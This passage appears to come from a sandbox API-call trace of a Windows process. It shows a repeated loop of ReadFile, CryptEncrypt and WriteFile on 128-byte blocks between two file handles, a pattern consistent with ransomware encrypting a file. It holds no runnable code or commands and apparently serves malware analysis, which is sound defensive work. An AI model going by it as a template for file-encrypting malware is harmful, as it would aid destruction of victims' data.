nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.130] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.130] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.130] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.130] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.131] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.131] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.131] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.131] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.131] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.131] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.131] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.131] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.131] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.131] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.131] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.131] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.131] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.131] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.131] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.131] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.131] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.131] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.131] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.131] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.131] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.132] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.132] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.132] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.132] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.132] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.132] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.132] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.132] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.132] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.132] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.132] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.132] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.132] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.132] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.132] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.132] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.132] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.132] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.132] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.132] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.132] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.132] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.132] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.133] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.133] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.133] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.133] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.133] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.133] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.133] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.133] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.133] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.133] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.133] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.133] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.133] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.133] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.133] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.133] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.133] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.133] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.133] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.133] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.133] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.133] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.133] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.134] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.134] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.134] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.134] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.134] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.134] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.134] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.134] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.134] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.134] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.134] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.134] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.134] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.134] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.134] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.134] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.134] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.134] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.134] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.134] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.134] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.134] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.134] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.135] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.135] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.135] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.135] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.135] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.135] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.135] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.135] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.135] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, dwBufLen=0x80 | out: pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80) returned 1 [0120.135] WriteFile (in: hFile=0x340, lpBuffer=0x326c064*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x326bfe8, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesWritten=0x326bfe8*=0x80, lpOverlapped=0x0) returned 1 [0120.135] ReadFile (in: hFile=0x344, lpBuffer=0x326c064, nNumberOfBytesToRead=0x80, lpNumberOfBytesRead=0x326bff4, lpOverlapped=0x0 | out: lpBuffer=0x326c064*, lpNumberOfBytesRead=0x326bff4*=0x80, lpOverlapped=0x0) returned 1 [0120.135] CryptEncrypt (in: hKey=0x284d568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x326c064*, pdwDataLen=0x326bff4*=0x80, 